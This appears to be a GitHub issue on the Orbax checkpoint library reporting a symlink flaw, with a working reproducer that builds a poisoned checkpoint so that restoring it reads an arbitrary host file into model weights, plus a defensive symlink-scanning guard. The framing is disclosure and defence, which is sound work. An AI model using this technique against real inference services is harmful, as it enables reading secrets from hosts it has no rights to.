Is it possible to forbid reading symlinks from the checkpoint? #3375

Description

@vfdev-5

Is it possible to forbid following symlinks inside the checkpoint folder, so that restoring a checkpoint cannot read arbitrary files from the file system?

orbax_checkpointer = ocp.Checkpointer(ocp.PyTreeCheckpointHandler())
restored = orbax_checkpointer.restore(ckpt_path, item=target)

This can be an issue when a user does not have full access to an infrastructure but can only reach some "inference engine" that lets them load pretrained weights. Such a user can "attack" the system with poisoned weights and read files from the host through the restored model weights.
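
The underlying mechanism does not depend on Orbax and can be sketched with the standard library and NumPy alone. This is a minimal illustration, assuming a POSIX file system and a naive loader that reads a raw chunk file with a plain `open()`; the helper `read_chunk_as_uint8` and the file names are hypothetical and are not part of any library.

```python
import tempfile
from pathlib import Path

import numpy as np


def read_chunk_as_uint8(chunk_path: Path) -> np.ndarray:
    """Read a raw, uncompressed chunk file the way a naive loader might."""
    # Regular file reads follow symlinks, so this returns the bytes of
    # whatever file the path ultimately points to.
    return np.frombuffer(chunk_path.read_bytes(), dtype=np.uint8)


with tempfile.TemporaryDirectory() as tmp:
    tmp = Path(tmp)

    # Hypothetical file that lives outside the checkpoint folder.
    secret = tmp / "secret.txt"
    secret.write_text("this-is-a-secret")

    # Hypothetical checkpoint folder whose only "chunk" is a symlink.
    ckpt = tmp / "ckpt"
    ckpt.mkdir()
    chunk = ckpt / "0"
    chunk.symlink_to(secret)

    # The "weights" are the raw bytes of the symlink target.
    leaked = read_chunk_as_uint8(chunk).tobytes()
    print(leaked)
```

Anything that later exposes the loaded array (for example, an endpoint that returns model parameters) would expose those bytes as well.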

Here is an orbax-checkpoint-only reproducer with detailed explanation:

from pathlib import Path
import shutil
import json
import numpy as np
import orbax.checkpoint as ocp


def make_poisoned_checkpoint(output_path: Path, file_to_read: Path, n: int):
    """Save a checkpoint, then swap the chunk of "w" for a symlink to `file_to_read`."""

    checkpointer = ocp.Checkpointer(
        ocp.PyTreeCheckpointHandler(use_ocdbt=False, use_zarr3=True)
    )
    checkpointer.save(output_path, {"w": np.zeros(n, np.uint8)})

    # replace the stored chunk of "w" with a symlink to the file we want to read
    p = output_path / "w" / "c" / "0"
    assert p.exists()
    p.unlink()
    p.symlink_to(file_to_read)

    # rewrite the zarr metadata so that "w" is a single raw (uncompressed)
    # chunk of n bytes
    p = output_path / "w" / "zarr.json"
    assert p.exists()
    p.unlink()
    with p.open("w") as f:
        obj = {
            "zarr_format": 3,
            "chunk_key_encoding": {"name": "default"},
            "node_type": "array",
            "fill_value": 0,
            "shape": [n],
            "data_type": "uint8",
            "chunk_grid": {
                "name": "regular",
                "configuration": {"chunk_shape": [n]},
            },
            "codecs": [{"name": "bytes"}],
        }
        json.dump(obj, f)


if __name__ == "__main__":
    # Context: say we want to read a file on a remote machine where we have
    # no direct file-system access, but we do have access to an inference engine
    # that lets us load a checkpoint and inspect the model's parameters.

    # Step 1:
    # On a host machine, we prepare a poisoned checkpoint containing a symlink
    # to the file we want to read on the remote machine.
    file_to_read = Path("/tmp/some_data")

    with file_to_read.open("w") as f:
        f.write("this-is-a-secret")

    chkpt_out_folder = Path("/tmp/poisoned_chkpt")
    if chkpt_out_folder.exists():
        shutil.rmtree(chkpt_out_folder)

    # Shortcut: we hard-code the exact number of bytes to read. Otherwise we would
    # need to make two checkpoints, using the first attempt to load a checkpoint
    # on the remote machine to find out the exact value.
    n = 22
    make_poisoned_checkpoint(chkpt_out_folder, file_to_read, n=n)

    # Step 2:
    # Now we are on the remote machine, where we have limited access:
    # we can load pretrained weights into a model and inspect the model weights.
    # We omit the model itself for simplicity.

    # Write something else to the file on the remote machine
    with file_to_read.open("w") as f:
        f.write("this-is-another-secret")

    # We "download" the poisoned checkpoint
    ckpt_path = chkpt_out_folder
    # We load the checkpoint
    checkpointer = ocp.Checkpointer(ocp.PyTreeCheckpointHandler())
    restored = checkpointer.restore(ckpt_path, item=None)
    # Now we can read the data from the file:
    print(bytes(np.asarray(restored["w"]).astype(np.uint8).tobytes()).splitlines()[0])
    # b'this-is-another-secret'
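
Until there is an answer on whether the library can forbid this, a user-side guard could scan the checkpoint folder for symlinks before calling `restore`. The following is only a sketch under stated assumptions: the checkpoint is on a local POSIX file system, and `find_symlinks` and `ensure_no_symlinks` are hypothetical helpers, not Orbax APIs. It does not cover hard links or a folder that is modified between the check and the restore.

```python
import os
import tempfile
from pathlib import Path


def find_symlinks(ckpt_dir: Path) -> list[Path]:
    """Return every entry under ckpt_dir that is a symbolic link."""
    found = []
    # os.walk does not descend into symlinked directories by default,
    # but it still lists them in dirnames, so they are checked too.
    for dirpath, dirnames, filenames in os.walk(ckpt_dir):
        for name in dirnames + filenames:
            p = Path(dirpath) / name
            if p.is_symlink():
                found.append(p)
    return found


def ensure_no_symlinks(ckpt_dir: Path) -> None:
    """Raise ValueError if the checkpoint folder contains any symlink."""
    found = find_symlinks(ckpt_dir)
    if found:
        raise ValueError(f"refusing to load checkpoint with symlinks: {found}")


# Demo on a folder that mimics the layout of the poisoned checkpoint above.
with tempfile.TemporaryDirectory() as tmp:
    tmp = Path(tmp)
    target = tmp / "some_data"
    target.write_text("this-is-a-secret")

    ckpt = tmp / "poisoned_chkpt"
    (ckpt / "w" / "c").mkdir(parents=True)
    (ckpt / "w" / "zarr.json").write_text("{}")
    (ckpt / "w" / "c" / "0").symlink_to(target)

    found_rel = [p.relative_to(ckpt).as_posix() for p in find_symlinks(ckpt)]
    print(found_rel)

    try:
        ensure_no_symlinks(ckpt)
        rejected = False
    except ValueError:
        rejected = True
    print(rejected)
```

In the reproducer, the guard would be called as `ensure_no_symlinks(ckpt_path)` right before `checkpointer.restore(ckpt_path, item=None)`.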

Context: google/flax#5487 (comment); credit goes to the author of that issue.
